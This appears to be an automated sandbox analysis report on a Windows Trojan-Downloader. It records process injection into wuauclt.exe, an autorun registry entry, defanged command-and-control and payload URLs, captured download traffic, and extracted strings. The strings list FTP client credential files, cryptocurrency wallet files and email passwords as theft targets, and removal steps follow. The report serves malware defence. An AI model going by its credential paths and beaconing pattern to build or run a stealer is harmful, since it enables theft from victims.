MD5: 1784a24cb1de74990d64c9681a0d52f9
SHA1: 0da515afb8b0e960a0d39d6050db87b0ba466e2b
SHA256: ad5f5fc0da1832175eaa589b1751b5d56c8cf6a8a1c9047821d04a4df518c655
SSDeep: 1536:stDiorTuf5 E3Pkc1f3ZVldwl8gu35ZnHUWNbM8GVD37Ue1zZaR8crQ TeNZPm/ :stDhCJ3KEBUW1Gl7xViKlN6WXIj
Size: 105984 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-08-03 21:48:15
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan-Downloader creates the following process(es):

%original file name%.exe:1096
vrsvps.exe:1932
vrsvps.exe:1924

The Trojan-Downloader injects its code into the following process(es):

wuauclt.exe:656

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1096 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\vrsvps\vrsvps.exe (601 bytes)

Registry activity

The process %original file name%.exe:1096 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 F6 20 F4 A5 3E 2F BF 5D 48 ED D8 60 05 CF B1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1438627695"
"Name" = "%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"" = "%Documents and Settings%\%current user%\Local Settings\Application Data\vrsvps\vrsvps.exe -a"

The process vrsvps.exe:1932 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 35 A6 47 B2 E1 76 8B AE CB 41 B3 47 C5 64 AC"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1438627695"
"Name" = "vrsvps.exe"

The process vrsvps.exe:1924 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 00 EC F4 86 B9 28 38 F3 14 A3 09 76 51 4E 17"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1438627695"
"Name" = "vrsvps.exe"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://pro7778.com/pro/getter.php?mode=reg&id=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&os=5132&vga=VMware SVGA II&ocl=0&skype=0	153.92.96.79
hxxp://glennmetales.com/backup/xmlrpc/css/file.exe	50.63.40.1

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /backup/xmlrpc/css/file.exe HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: glennmetales.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 11 Sep 2015 09:10:29 GMT

Server: Apache

Last-Modified: Mon, 03 Aug 2015 18:50:36 GMT

ETag: "19e00-51c6ca52fb629"

Accept-Ranges: bytes

Content-Length: 105984

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: application/x-msdownload
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........dd.f.7.f.7
.f.7...7.f.7...7.f.7...7.f.7.f.7.f.7...7.f.7...7.f.7...7.f.7Rich.f.7..
......................PE..L...o..U.................F..........g.......
.`....@...............................................................
......................................................................
................@............`..$............................ihuzseh.D
.......F.................. ..`.rdata...?...`[email protected]..............@..@
[email protected].........................
......@..@............................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................Hl0xWBCK9Xs1kHF/alxi mMFWU
eP9lTzueOaaB1h302sN10VcA9IQylC9XZBq14A7tI2w/UCNl7MOASra1XaKpQuyHm7qrDu
6DKczOovVOMEidFsnVhpa0MpxW1mz/QcUM7gLfKi036RebenVKEMVZ FLSmJeFSFCUtx91
Xi7e9JYM5UlftcFqR084RpgAxFaeAine2CeS Yq6O3bYPwSgl5Wb0mYWUagtBapYcNA/GL
17rHhpwmUvJf/Z7EVGWKO5a3pbSHKGOnUMATKNobCdGJrDv0hb8ikw1XrwwzEMfFvymrft
GDaQKfE piPGHOiD1DFc avuxgrI6Y62HJi3zh4sRkYQjbGmfdClSApCek9JiGU1hil7Gh
b3EKz2bCTTo bk/xzaiqvnS36U2rtfskYFPSmCYy5P/mXklvsuFdEW0KfNBvTVJkj5UGhX
cX1j/C8panMaGiDRa6IM9rfYl1Gw4Q0CEA9WIulQ0FTU57sylVv00/QjfNIyyJG5Kl
<<< skipped >>>

GET /pro/getter.php?mode=reg&id=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&os=5132&vga=VMware SVGA II&ocl=0&skype=0 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: pro7778.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 11 Sep 2015 09:10:29 GMT

Content-Type: text/html

Content-Length: 59

Connection: keep-alive

Vary: Accept-Encoding

X-Powered-By: PHP/5.3.29

Vary: Accept-Encoding,User-Agent
#update;hXXp://glennmetales.com/backup/xmlrpc/css/file.exe;HTTP/1.1 20
0 OK..Server: nginx..Date: Fri, 11 Sep 2015 09:10:29 GMT..Content-Type
: text/html..Content-Length: 59..Connection: keep-alive..Vary: Accept-
Encoding..X-Powered-By: PHP/5.3.29..Vary: Accept-Encoding,User-Agent..
#update;hXXp://glennmetales.com/backup/xmlrpc/css/file.exe;..

The Trojan-Downloader connects to the servers at the folowing location(s):

.text

`.data

.rsrc

@.reloc

wuauclt.pdb

GetProcessHeap

KERNEL32.dll

_wcmdln

_amsg_exit

msvcrt.dll

ntdll.dll

ole32.dll

RegCloseKey

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

USER32.dll

OLEAUT32.dll

SHLWAPI.dll

zcÁ

version="6.0.0.0"

name="Microsoft.Windows.windowsupdate.wuauclt"

<windowsSettings>

<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>

</windowsSettings>

name="Microsoft.Windows.Common-Controls"

publicKeyToken="6595b64144ccf1df"

<requestedExecutionLevel

wuaueng.dll

Error: 0xx. wuauclt handler: failed to spawn COM server

Error: 0xx. wuauclt handler: failed to load wuaueng

/ReportNow

/ShowWindowsUpdate

/CloseWindowsUpdate

wuauclt.exe failed to get proc address for UI export object with error %#lx

Failed to load %s with error %X

wucltui.dll

wucltux.dll

call RunAUClientUI on wucltui.dll/wucltux.dll

Ntdll.dll

WuSqm %ls session datapoint (id:%d) is incremented with dword %d.

wuauclt.exe is exiting with code 0xX

wuauclt.exe launched with command line %s

kernel32.dll

WUWeb

Report

7.6.7600.256

Global\WindowsUpdateTracingMutex

WindowsUpdate.log

SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace

Windows

shell32.dll

%s: %s [

%s: %s

%s\%s

= Module: %s

= Module: <failed with %d>

= Process: %s

= Process: <failed with %d>

=========== Logging initialized (build: %s, tz: %s) ===========

wups2.dll

wups.dll

Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\

%hs %ls page "%ls", hr=%X

Microsoft.WindowsUpdate

wupdmgr.exe

Failed to cocreate IShellWindows, error = 0xlX

Failed to obtain window doc for window %d, error = 0xlX

Failed to obtain folder view for window %d, error = 0xlX

Failed to obtain folder IPersist for window %d, error = 0xlX

Window %d is NOT a WU window

Done enumerating windows

Quit for window %d failed: 0xlX

Window %d is a WU window. Attempting to close

Failed to obtain class ID for window %d, error = 0xlX

Got NULL disp interface for window %d

Got %d instead of VT_DISPATCH for window %d

Failed to obtain IWebBrowserApp for window %d, error = 0xlX

Failed to enumerate window %d, error = 0xlX

Found %d explorer windows

Closing WU explorer windows

Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData

WUAppNotificationWindows

SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired

SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory

SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting

SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\

%chdhd

hd-hd-hd%chd:hd:hd:hd

Windows Update

7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)

wuauclt.exe

Windows

Operating System

wuauclt.exe_656_rwx_000A0000_00009000:

.text

`.rdata

@.data

.reloc

ntdll.dll

kernel32.dll

KERNELBASE.dll

=#= =:=[=

Kernel32.dll

Advapi32.dll

Shlwapi.dll

Shell32.dll

User32.dll

WS2_32.dll

Winhttp.dll

Setupapi.dll

Psapi.dll

Crypt32.dll

msvcrt.dll

OpenCL.dll

hXXp://pro7778.com/pro/getter.php

mode=report

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

SysWOW64\svchost.exe

System32\wuauclt.exe

\Software\Microsoft\Windows\CurrentVersion\Run

ClassicFTP

HKCU\Software\NCH Software\ClassicFTP\FTPAccounts

CoreFTP

HKCU\Software\FTPWare\CoreFTP\Sites

FileZilla\sitemanager.xml

CuteFTP

Globalscape\CuteFTP\9.0\sm.dat

Cyberduck\Bookmarks\*.duck

FlashFXP\5\Sites.dat

FlashFXP\5\quick.dat

LeapFTP

LeapWare\LeapFTP\sites.dat

NppFTP

Notepad  \plugins\config\NppFTP\NppFTP.xml

VoyagerFTP

RhinoSoft\FTP Voyager\FTPVoyager.Archive

SmartFTP

SmartFTP\Client 2.0\Favorites\*.xml

SmartFTP\Client 2.0\Favorites\Quick Connect\*.xml

TotalCmdr

GHISLER\wcx_PTF.ini

WS_FTP

Ipswitch\WS_FTP\Sites\ws_PTF.ini

Bitcoin\wallet.dat

Litecoin\wallet.dat

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Software\Microsoft\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

export "

reg.exe

SMTP User

SMTP Password

IMAP Password

POP3 Password

75ed9567-aa58-4c8e-a8ea-3cad7c47ab03

vrsvps.exe

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:1096
   vrsvps.exe:1932
   vrsvps.exe:1924
   

2. Delete the original Trojan-Downloader file.
   
3. Delete or disinfect the following files created/modified by the Trojan-Downloader:
   

   %Documents and Settings%\%current user%\Local Settings\Application Data\vrsvps\vrsvps.exe (601 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "" = "%Documents and Settings%\%current user%\Local Settings\Application Data\vrsvps\vrsvps.exe -a"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.